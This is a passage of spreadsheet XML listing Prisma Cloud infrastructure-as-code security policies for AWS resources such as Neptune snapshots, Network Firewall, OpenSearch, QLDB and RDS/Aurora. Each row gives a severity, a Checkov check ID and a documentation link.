        </is>
      </c>
      <c r="W811" t="inlineStr">
        <is>
          <t>Ensure Neptune snapshot is encrypted by KMS using a customer managed Key (CMK)</t>
        </is>
      </c>
      <c r="X811" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-280</t>
        </is>
      </c>
      <c r="Y811" t="inlineStr"/>
      <c r="Z811" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_neptune_cluster_snapshot"]}</t>
        </is>
      </c>
      <c r="AA811" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB811" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC811" t="inlineStr">
        <is>
          <t>CKV_AWS_280</t>
        </is>
      </c>
      <c r="AD811" t="b">
        <v>1</v>
      </c>
      <c r="AE811" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF811" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG8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1" t="inlineStr">
        <is>
          <t>e3156909-bfa2-4972-9e75-cfa27c667abb</t>
        </is>
      </c>
      <c r="AI811" t="inlineStr"/>
      <c r="AJ811" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK811" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="812">
      <c r="A812" t="inlineStr"/>
      <c r="B812" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C812" s="2" t="inlineStr"/>
      <c r="D812" t="inlineStr"/>
      <c r="E812" t="inlineStr"/>
      <c r="F812" t="inlineStr"/>
      <c r="G812" t="b">
        <v>1</v>
      </c>
      <c r="H8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2" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J812" t="inlineStr">
        <is>
          <t>IaC:General:aws-neptune</t>
        </is>
      </c>
      <c r="K812" t="inlineStr">
        <is>
          <t>Neptune snapshot is not securely encrypted</t>
        </is>
      </c>
      <c r="L812" t="inlineStr"/>
      <c r="M812" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N812" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O812" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P812" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q812" t="inlineStr"/>
      <c r="R812" t="inlineStr"/>
      <c r="S812" t="inlineStr"/>
      <c r="T812" t="b">
        <v>0</v>
      </c>
      <c r="U812" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V812" t="inlineStr">
        <is>
          <t>IaC:General:aws-neptune-cluster-snapshot</t>
        </is>
      </c>
      <c r="W812" t="inlineStr">
        <is>
          <t>Ensure Neptune snapshot is securely encrypted</t>
        </is>
      </c>
      <c r="X812" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-279</t>
        </is>
      </c>
      <c r="Y812" t="inlineStr"/>
      <c r="Z812" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_neptune_cluster_snapshot"]}</t>
        </is>
      </c>
      <c r="AA812" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB812" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC812" t="inlineStr">
        <is>
          <t>CKV_AWS_279</t>
        </is>
      </c>
      <c r="AD812" t="b">
        <v>1</v>
      </c>
      <c r="AE812" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF812" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG8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2" t="inlineStr">
        <is>
          <t>d7e4115f-f986-4775-be32-2646b4c72575</t>
        </is>
      </c>
      <c r="AI812" t="inlineStr"/>
      <c r="AJ812" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK812" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="813">
      <c r="A813" t="inlineStr"/>
      <c r="B813" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C813" s="2" t="inlineStr"/>
      <c r="D813" t="inlineStr"/>
      <c r="E813" t="inlineStr"/>
      <c r="F813" t="inlineStr"/>
      <c r="G813" t="b">
        <v>1</v>
      </c>
      <c r="H8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3" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J813" t="inlineStr">
        <is>
          <t>IaC:General:aws-networkfirewall</t>
        </is>
      </c>
      <c r="K813" t="inlineStr">
        <is>
          <t>Network firewalls do not have deletion protection enabled</t>
        </is>
      </c>
      <c r="L813" t="inlineStr"/>
      <c r="M813" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N813" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O813" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P813" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q813" t="inlineStr"/>
      <c r="R813" t="inlineStr"/>
      <c r="S813" t="inlineStr"/>
      <c r="T813" t="b">
        <v>0</v>
      </c>
      <c r="U813" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V813" t="inlineStr">
        <is>
          <t>IaC:General:aws-networkfirewall-firewall</t>
        </is>
      </c>
      <c r="W813" t="inlineStr">
        <is>
          <t>Ensure that Network firewalls have deletion protection enabled</t>
        </is>
      </c>
      <c r="X813" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-344</t>
        </is>
      </c>
      <c r="Y813" t="inlineStr"/>
      <c r="Z813" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_networkfirewall_firewall"]}</t>
        </is>
      </c>
      <c r="AA813" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB813" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC813" t="inlineStr">
        <is>
          <t>CKV_AWS_344</t>
        </is>
      </c>
      <c r="AD813" t="b">
        <v>1</v>
      </c>
      <c r="AE813" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF813" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG8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3" t="inlineStr">
        <is>
          <t>944cf276-7948-4e13-ab4a-fc9e2dd78c31</t>
        </is>
      </c>
      <c r="AI813" t="inlineStr"/>
      <c r="AJ813" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK813" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="814">
      <c r="A814" t="inlineStr"/>
      <c r="B814" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C814" s="2" t="inlineStr"/>
      <c r="D814" t="inlineStr"/>
      <c r="E814" t="inlineStr"/>
      <c r="F814" t="inlineStr"/>
      <c r="G814" t="b">
        <v>1</v>
      </c>
      <c r="H8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4" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J814" t="inlineStr">
        <is>
          <t>IaC:General:aws-networkfirewall</t>
        </is>
      </c>
      <c r="K814" t="inlineStr">
        <is>
          <t>Network firewall encryption does not use a CMK</t>
        </is>
      </c>
      <c r="L814" t="inlineStr"/>
      <c r="M814" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N814" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O814" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P814" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q814" t="inlineStr"/>
      <c r="R814" t="inlineStr"/>
      <c r="S814" t="inlineStr"/>
      <c r="T814" t="b">
        <v>0</v>
      </c>
      <c r="U814" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V814" t="inlineStr">
        <is>
          <t>IaC:General:aws-networkfirewall-firewall,aws-networkfirewall-rule-group</t>
        </is>
      </c>
      <c r="W814" t="inlineStr">
        <is>
          <t>Ensure that Network firewall encryption is via a CMK</t>
        </is>
      </c>
      <c r="X814" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-345</t>
        </is>
      </c>
      <c r="Y814" t="inlineStr"/>
      <c r="Z814" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_networkfirewall_firewall","aws_networkfirewall_rule_group"]}</t>
        </is>
      </c>
      <c r="AA814" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB814" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC814" t="inlineStr">
        <is>
          <t>CKV_AWS_345</t>
        </is>
      </c>
      <c r="AD814" t="b">
        <v>1</v>
      </c>
      <c r="AE814" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF814" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG8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4" t="inlineStr">
        <is>
          <t>fe8abe8d-d8e4-4aae-a0f5-fb1d3eb495b2</t>
        </is>
      </c>
      <c r="AI814" t="inlineStr"/>
      <c r="AJ814" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK814" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="815">
      <c r="A815" t="inlineStr"/>
      <c r="B815" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C815" s="2" t="inlineStr"/>
      <c r="D815" t="inlineStr"/>
      <c r="E815" t="inlineStr"/>
      <c r="F815" t="inlineStr"/>
      <c r="G815" t="b">
        <v>1</v>
      </c>
      <c r="H8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5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J815" t="inlineStr">
        <is>
          <t>IaC:General:aws-networkfirewall</t>
        </is>
      </c>
      <c r="K815" t="inlineStr">
        <is>
          <t>Network Firewall Policy does not define an encryption configuration that uses a CMK</t>
        </is>
      </c>
      <c r="L815" t="inlineStr"/>
      <c r="M815" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N815" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O815" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P815" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q815" t="inlineStr"/>
      <c r="R815" t="inlineStr"/>
      <c r="S815" t="inlineStr"/>
      <c r="T815" t="b">
        <v>0</v>
      </c>
      <c r="U815" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V815" t="inlineStr">
        <is>
          <t>IaC:General:aws-networkfirewall-firewall-policy</t>
        </is>
      </c>
      <c r="W815" t="inlineStr">
        <is>
          <t>Ensure Network Firewall Policy defines an encryption configuration that uses a customer managed Key (CMK)</t>
        </is>
      </c>
      <c r="X815" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-346</t>
        </is>
      </c>
      <c r="Y815" t="inlineStr"/>
      <c r="Z815" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_networkfirewall_firewall_policy"]}</t>
        </is>
      </c>
      <c r="AA815" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB815" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC815" t="inlineStr">
        <is>
          <t>CKV_AWS_346</t>
        </is>
      </c>
      <c r="AD815" t="b">
        <v>1</v>
      </c>
      <c r="AE815" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF815" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG8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5" t="inlineStr">
        <is>
          <t>b96dbec2-c227-43a0-9bbb-fbecc2625016</t>
        </is>
      </c>
      <c r="AI815" t="inlineStr"/>
      <c r="AJ815" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK815" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="816">
      <c r="A816" t="inlineStr"/>
      <c r="B816" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C816" s="2" t="inlineStr"/>
      <c r="D816" t="inlineStr"/>
      <c r="E816" t="inlineStr"/>
      <c r="F816" t="inlineStr"/>
      <c r="G816" t="b">
        <v>1</v>
      </c>
      <c r="H8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6" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J816" t="inlineStr">
        <is>
          <t>IaC:General:aws-opensearch</t>
        </is>
      </c>
      <c r="K816" t="inlineStr">
        <is>
          <t>AWS Elasticsearch domain does not use an updated TLS policy</t>
        </is>
      </c>
      <c r="L816" t="inlineStr"/>
      <c r="M816" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N816" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O816" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P816" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q816" t="inlineStr"/>
      <c r="R816" t="inlineStr"/>
      <c r="S816" t="inlineStr"/>
      <c r="T816" t="b">
        <v>0</v>
      </c>
      <c r="U816" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V816" t="inlineStr">
        <is>
          <t>IaC:General:aws-opensearch-domain,aws-elasticsearch-domain</t>
        </is>
      </c>
      <c r="W816" t="inlineStr">
        <is>
          <t>Verify Elasticsearch domain is using an up to date TLS policy</t>
        </is>
      </c>
      <c r="X816" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-aws-elasticsearch-domain-uses-an-updated-tls-policy</t>
        </is>
      </c>
      <c r="Y816" t="inlineStr"/>
      <c r="Z816" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_opensearch_domain", "aws_elasticsearch_domain"]}</t>
        </is>
      </c>
      <c r="AA816" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB816" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC816" t="inlineStr">
        <is>
          <t>CKV_AWS_228</t>
        </is>
      </c>
      <c r="AD816" t="b">
        <v>1</v>
      </c>
      <c r="AE816" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF816" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG8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6" t="inlineStr">
        <is>
          <t>c9ac4929-87b5-4c97-b59d-b763ddd4727a</t>
        </is>
      </c>
      <c r="AI816" t="inlineStr"/>
      <c r="AJ816" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK816" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="817">
      <c r="A817" t="inlineStr"/>
      <c r="B817" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C817" s="2" t="inlineStr"/>
      <c r="D817" t="inlineStr"/>
      <c r="E817" t="inlineStr"/>
      <c r="F817" t="inlineStr"/>
      <c r="G817" t="b">
        <v>1</v>
      </c>
      <c r="H8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7" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J817" t="inlineStr">
        <is>
          <t>IaC:General:aws-opensearch</t>
        </is>
      </c>
      <c r="K817" t="inlineStr">
        <is>
          <t>AWS all data stored in the Elasticsearch domain is not encrypted using a Customer Managed Key (CMK)</t>
        </is>
      </c>
      <c r="L817" t="inlineStr"/>
      <c r="M817" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N817" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O817" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P817" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q817" t="inlineStr"/>
      <c r="R817" t="inlineStr"/>
      <c r="S817" t="inlineStr"/>
      <c r="T817" t="b">
        <v>0</v>
      </c>
      <c r="U817" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V817" t="inlineStr">
        <is>
          <t>IaC:General:aws-opensearch-domain,aws-elasticsearch-domain</t>
        </is>
      </c>
      <c r="W817" t="inlineStr">
        <is>
          <t>Ensure all data stored in the Elasticsearch is encrypted with a CMK</t>
        </is>
      </c>
      <c r="X817" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-aws-all-data-stored-in-the-elasticsearch-domain-is-encrypted-using-a-customer-managed-key-cmk</t>
        </is>
      </c>
      <c r="Y817" t="inlineStr"/>
      <c r="Z817" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_opensearch_domain", "aws_elasticsearch_domain"]}</t>
        </is>
      </c>
      <c r="AA817" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB817" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC817" t="inlineStr">
        <is>
          <t>CKV_AWS_247</t>
        </is>
      </c>
      <c r="AD817" t="b">
        <v>1</v>
      </c>
      <c r="AE817" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF817" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG8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7" t="inlineStr">
        <is>
          <t>1fc1f970-29da-44e2-8b62-d668eb03671d</t>
        </is>
      </c>
      <c r="AI817" t="inlineStr"/>
      <c r="AJ817" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK817" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="818">
      <c r="A818" t="inlineStr"/>
      <c r="B818" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C818" s="2" t="inlineStr"/>
      <c r="D818" t="inlineStr"/>
      <c r="E818" t="inlineStr"/>
      <c r="F818" t="inlineStr"/>
      <c r="G818" t="b">
        <v>1</v>
      </c>
      <c r="H8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8" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J818" t="inlineStr">
        <is>
          <t>IaC:General:aws-qldb</t>
        </is>
      </c>
      <c r="K818" t="inlineStr">
        <is>
          <t>QLDB ledger permissions mode is not set to STANDARD</t>
        </is>
      </c>
      <c r="L818" t="inlineStr"/>
      <c r="M818" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N818" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O818" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P818" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q818" t="inlineStr"/>
      <c r="R818" t="inlineStr"/>
      <c r="S818" t="inlineStr"/>
      <c r="T818" t="b">
        <v>0</v>
      </c>
      <c r="U818" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V818" t="inlineStr">
        <is>
          <t>IaC:General:aws-qldb-ledger</t>
        </is>
      </c>
      <c r="W818" t="inlineStr">
        <is>
          <t>Ensure QLDB ledger permissions mode is set to STANDARD</t>
        </is>
      </c>
      <c r="X818" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-qldb-ledger-permissions-mode-is-set-to-standard-1</t>
        </is>
      </c>
      <c r="Y818" t="inlineStr"/>
      <c r="Z818" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_qldb_ledger"]}</t>
        </is>
      </c>
      <c r="AA818" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB818" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC818" t="inlineStr">
        <is>
          <t>CKV_AWS_170</t>
        </is>
      </c>
      <c r="AD818" t="b">
        <v>1</v>
      </c>
      <c r="AE818" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF818" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG8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8" t="inlineStr">
        <is>
          <t>b1c558e0-ec7d-4c9f-8705-b1f3ec5e8ad0</t>
        </is>
      </c>
      <c r="AI818" t="inlineStr"/>
      <c r="AJ818" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK818" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="819">
      <c r="A819" t="inlineStr"/>
      <c r="B819" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C819" s="2" t="inlineStr"/>
      <c r="D819" t="inlineStr"/>
      <c r="E819" t="inlineStr"/>
      <c r="F819" t="inlineStr"/>
      <c r="G819" t="b">
        <v>1</v>
      </c>
      <c r="H8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19" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J819" t="inlineStr">
        <is>
          <t>IaC:General:aws-rds</t>
        </is>
      </c>
      <c r="K819" t="inlineStr">
        <is>
          <t>RDS clusters do not have an AWS Backup backup plan</t>
        </is>
      </c>
      <c r="L819" t="inlineStr"/>
      <c r="M819" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N819" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O819" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P819" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q819" t="inlineStr"/>
      <c r="R819" t="inlineStr"/>
      <c r="S819" t="inlineStr"/>
      <c r="T819" t="b">
        <v>0</v>
      </c>
      <c r="U819" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V819" t="inlineStr">
        <is>
          <t>IaC:General:aws-rds-cluster</t>
        </is>
      </c>
      <c r="W819" t="inlineStr">
        <is>
          <t>Ensure that RDS clusters has backup plan of AWS Backup</t>
        </is>
      </c>
      <c r="X819" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-that-rds-clusters-has-backup-plan-of-aws-backup</t>
        </is>
      </c>
      <c r="Y819" t="inlineStr"/>
      <c r="Z819" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_rds_cluster"]}</t>
        </is>
      </c>
      <c r="AA819" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB819" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC819" t="inlineStr">
        <is>
          <t>CKV2_AWS_8</t>
        </is>
      </c>
      <c r="AD819" t="b">
        <v>1</v>
      </c>
      <c r="AE819" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF819" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG8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19" t="inlineStr">
        <is>
          <t>1af5bc6e-3104-46c0-8dae-8a29874cdbad</t>
        </is>
      </c>
      <c r="AI819" t="inlineStr"/>
      <c r="AJ819" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK819" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="820">
      <c r="A820" t="inlineStr"/>
      <c r="B820" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C820" s="2" t="inlineStr"/>
      <c r="D820" t="inlineStr"/>
      <c r="E820" t="inlineStr"/>
      <c r="F820" t="inlineStr"/>
      <c r="G820" t="b">
        <v>1</v>
      </c>
      <c r="H8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0" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J820" t="inlineStr">
        <is>
          <t>IaC:General:aws-rds</t>
        </is>
      </c>
      <c r="K820" t="inlineStr">
        <is>
          <t>RDS Aurora Clusters do not have backtracking enabled</t>
        </is>
      </c>
      <c r="L820" t="inlineStr"/>
      <c r="M820" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N820" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O820" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P820" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q820" t="inlineStr"/>
      <c r="R820" t="inlineStr"/>
      <c r="S820" t="inlineStr"/>
      <c r="T820" t="b">
        <v>0</v>
      </c>
      <c r="U820" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V820" t="inlineStr">
        <is>
          <t>IaC:General:aws-rds-cluster</t>
        </is>
      </c>
      <c r="W820" t="inlineStr">
        <is>
          <t>Ensure that RDS Aurora Clusters have backtracking enabled</t>
        </is>
      </c>
      <c r="X820" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-326</t>
        </is>
      </c>
      <c r="Y820" t="inlineStr"/>
      <c r="Z820" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_rds_cluster"]}</t>
        </is>
      </c>
      <c r="AA820" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB820" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC820" t="inlineStr">
        <is>
          <t>CKV_AWS_326</t>
        </is>
      </c>
      <c r="AD820" t="b">
        <v>1</v>
      </c>
      <c r="AE820" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF820" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG8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0" t="inlineStr">
        <is>
          <t>14a2eb3c-1958-4904-87f1-5ac9761e80cf</t>
        </is>
      </c>
      <c r="AI820" t="inlineStr"/>
      <c r="AJ820" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK820" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="821">
      <c r="A821" t="inlineStr"/>
      <c r="B821" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C821" s="2" t="inlineStr"/>
      <c r="D821" t="inlineStr"/>
      <c r="E821" t="inlineStr"/>
      <c r="F821" t="inlineStr"/>
      <c r="G821" t="b">
        <v>1</v>
      </c>
      <c r="H8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1" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J821" t="inlineStr">
        <is>
          <t>IaC:General:aws-rds</t>
        </is>
      </c>
      <c r="K821" t="inlineStr">
        <is>
          <t>Not all data stored in Aurora is securely encrypted at rest</t>
        </is>
      </c>
      <c r="L821" t="inlineStr"/>
      <c r="M821" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N821" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O821" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P821" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q821" t="inlineStr"/>
      <c r="R821" t="inlineStr"/>
      <c r="S821" t="inlineStr"/>
      <c r="T821" t="b">
        <v>0</v>
      </c>
      <c r="U821" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V821" t="inlineStr">
        <is>
          <t>IaC:General:aws-rds-cluster</t>
        </is>
      </c>
      <c r="W821" t="inlineStr">
        <is>
          <t>Ensure all data stored in Aurora is securely encrypted at rest</t>
        </is>
      </c>
      <c r="X821" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-general-38</t>
        </is>
      </c>
      <c r="Y821" t="inlineStr"/>
      <c r="Z821" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_rds_cluster"]}</t>
        </is>
      </c>
      <c r="AA821" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB821" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC821" t="inlineStr">
        <is>
          <t>CKV_AWS_96</t>
